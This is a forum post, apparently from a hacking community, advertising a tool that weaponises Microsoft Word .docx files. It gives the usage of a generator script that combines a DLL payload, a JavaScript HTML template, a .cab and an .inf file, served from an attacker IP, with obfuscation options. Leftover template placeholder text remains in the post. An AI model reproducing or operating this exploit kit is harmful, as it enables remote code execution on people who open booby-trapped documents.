• We just launched and are currently in beta. Join us as we build and grow the community.

Advertise Here

Advertise Here

Advertise Here

The new Vulnerability on microsoft office word file.docx

Capo

Skill Tree Master
C Rep
0
0
0
Rep
0
C Vouches
0
0
0
Vouches
0
Posts
135
Likes
88
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 2 900 XP
Usage
Ensure to run setup.sh first as you will need few directories. Once you have run the script, you should be able to run gen.py with the example given:
Code:
Code:
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3
# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity
Notes
  • The location of http.server will be in web directory. This directory will have 3 files:-
  • .cab
  • .html
  • .docx
[Paste your content here. Remove this line and one below!]
[DO NOT PASTE THE CONTENT ABOVE OR BELOW THE REPLY QUOTES]
 

452,498

347,822

347,831

Top